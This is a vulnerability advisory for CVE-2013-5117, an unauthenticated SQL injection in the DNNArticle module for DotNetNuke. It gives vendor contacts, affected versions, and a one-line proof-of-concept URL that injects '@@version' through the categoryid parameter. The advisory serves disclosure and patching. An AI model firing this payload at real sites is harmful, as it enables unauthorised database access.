31 lines
840 B
Text
Executable file
31 lines
840 B
Text
Executable file
Title: DotNetNuke (DNNArticle Module) SQL Injection Vulnerability
|
|
References: CVE-2013-5117
|
|
Discovered by: Sajjad Pourali
|
|
|
|
Vendor http://www.zldnn.com/ , http://www.dnnarticle.com/?
|
|
Vendor advisory: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)
|
|
Vendor contact: 2013-8-14
|
|
|
|
Solution: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)
|
|
|
|
Remote: yes
|
|
Authentication required: no
|
|
User interaction required: no
|
|
Impact: High
|
|
|
|
Affected:
|
|
|
|
- DNNArticle 10.0 and earlier
|
|
|
|
---
|
|
|
|
PoC:
|
|
|
|
http://server/desktopmodules/dnnarticle/dnnarticlerss.aspx?moduleid=0&categoryid=1+or+1=@@version
|
|
|
|
---
|
|
|
|
+ Sajjad Pourali
|
|
+ http://www.securation.com/
|
|
+ http://www.cert.um.ac.ir/
|
|
+ Contact: sajjad[at]securation.com
|